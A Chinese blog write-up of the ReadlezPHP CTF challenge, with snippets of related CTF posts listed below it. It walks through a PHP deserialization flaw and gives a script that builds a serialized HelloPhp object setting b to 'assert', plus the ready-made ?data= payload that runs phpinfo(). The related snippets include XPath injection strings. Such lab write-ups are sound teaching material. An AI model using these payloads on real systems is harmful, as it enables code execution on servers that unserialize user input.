[NPUCTF2020]ReadlezPHP【web系列】

已于 2024-02-29 14:22:34 修改
阅读量410 收藏
点赞数
分类专栏: CTF 文章标签: php 经验分享
于 2022-10-05 23:51:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shutTD/article/details/127178458
版权

一、审题

打开题目发现是一个帅帅的界面

发现没什么有用的,那就f12康康有什么有用的,仔细查看每一个标签发现有一个网址 ./time.php?source 我们跟着点进去一看发现是一段源代码,那这里就是解题的入口了

 

看到 unserialize 就知道这道题是php反序列化了,所以接下来就是php反序列化做题流程。

二、找出目标函数,并寻找序列化入口

这题反序列化链很短,入口即终点,我们跟进__destruct():

public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }

发现echo $b($a)那么这里就是个危险函数了也是我们的解题的最终步骤,在这里我们就需要认识一个函数了assert()即可以把传入的参数当成php代码执行,那这就好办了我们只需要将$b赋值为assert,$a赋值为我们需要执行的php代码就可以达到任意命令的执行。

三、编写脚本

直接上代码:

<?php

class HelloPhp
{
    public $a = "phpinfo()";
    public $b = "assert";
    
}
$res = new HelloPhp();
echo serialize($res);

得到序列化字符串 O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";},并赋值给data进行get传参,即具体url为:/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";} 可以发现成功执行phpinfo()

 搜索一下flag{即可发现flag

shutTD
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第五十九题——[NPUCTF2020]ReadlezPHP
分享简单的安全技术
05-08 313
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,按f12查看源码,看到一个跳转提示:/time.php?source 第二步:查看time.php界面,发现源代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s";
[NPUCTF2020]ReadlezPHP
paidx0
09-03 135
每天一题,记录学习 首先注意到的就是右键看不了源码,那就直接抓包来看,可恶,注意到有一个隐藏的 <a href="./time.php?source"></a> 标签 去访问这个./time.php?source 看看,很明显就是一道反序列化的题目 代码很简单,就是$a和$b形成嵌套$b($a) 来执行就行了 注意一下eval和assert的区别 eval和assert 二者都可以执行PHP语句。只不过是,eval规范更加严格一些,必须符合PHP代码要求。而assert则没有那
NPUCTF 2020 Crypto
cwr1499640048的博客
05-23 665
NPUCTF 2020 Crypto 认清形势,建立信心 p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, ...
Web】CTFSHOW PHP命令执行刷题记录(全)
最新发布
uuzeray的博客
01-10 1116
期末复习不了一点,不如做点旧题醒一醒手感。每一题都尽量用不同payload,如果相同会合并。
npuctf_2020_easyheap详解
像初雪一样自由洒落
04-25 815
off by one的题,,, 参考视频:off by one + 改got表的heap做法 例题:npuctf_2020_easyheap 程序流程 create: 申请两个chunk: 一个heaparray[i](固定0x10大小),一个是申请的大小(只能申请0x18或0x38) edit: read_input(heaparray[(signed int)v1][1], *heaparray[(signed int)v1] + 1LL); 存在off by one show:根据id.
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
解读“模块的沟通”
08-04
功能模块在接收到Start_Sig信号后开始执行一系列操作,当操作完成后,它会设置Done_sig为1表示任务完成。控制模块则根据Done_sig的值来控制Start_Sig,以便在功能模块完成任务后停止发送新的任务。 在功能模块中,...
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
[NPUCTF2020]这是什么觅
sm1918451478的博客
10-30 592
BUUCTF·[NPUCTF2020]这是什么觅🐎·WP
NPUCTF2020]ReadlezPHP
Hopeace的博客
10-20 2816
[NPUCTF2020]ReadlezPHP0x01 浏览题目0x02 分析题目php @0x03 复现0x04 补充 作者:Hopeace 靶机地址:https://buuoj.cn/challenges#[NPUCTF2020]ReadlezPHP 0x01 浏览题目 主页和源代码都没有什么有用的信息 抓包试试response里有木有东西 http://www.nwpu.edu.cn 西工大的宣传页面,对此题属于无用信息 扫目录,没有结果 再仔细看一遍源代码 ctrl + f 搜索.php看有没有泄露的
2020全国信息安全大赛 web之trick
Firebasky的博客
08-22 737
参加了国赛,才发现自己太菜了,自己做的时候不会 一看别人wp,cm!。正所谓赛后诸葛亮,今天自己也来总结一下这道题 上源代码 <?php class trick{ public $a; public $b; public function __destruct(){ $this->a = (string)$this->a; if(strlen($this->a) > 5 || strlen($this->b) &.
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4851
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
[NPUCTF2020]认清形势,建立信心
weixin_44110537的博客
07-27 688
encrypt from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4,
[NPUCTF2020]ezinclude
qq_40327508的博客
12-09 1649
进入页面发现需要传入name和pass,源代码发现hint 疑似MD5哈希长度拓展攻击,在响应包里面给出啦pass的值 得到了 flflflflag.php ,访问重定向到了其他页面,抓包抓回来,页面提示 include($_GET[“file”]) ,扫目录可以得到 dir.php ,包含他可以看到这个页面列出了 /tmp 下的所有文件 这里考察的是PHP临时文件包含,其基本是两种情况: 利用能访问的phpinfo页面,对其一次发送大量数据造成临时文件没有及时被删除 PHP版本<7.2,利用ph
[NPUCTF2020]ezlogin
SopRomeo的博客
06-04 1506
bp瞅瞅 发现他提交的与常见的不同 搜索一波,发现是XPATH注入 XPATH注入讲解 把文章给出的poc放上去 'or count(/)=1 or ''=' 改成2 有明显的的布尔回显(注意在重新提交的时候记得刷新下页面) 说明他根下只有一个节点 接下来是盲注了,注意他那里有个token,过期时间比较快,记得用会话保持状态带上。 测试长度 payload 'or string-length(name(/*[1]))=4 or ''=' 长度为4 猜测根节点下的名称 'or substrin.
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shutTD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值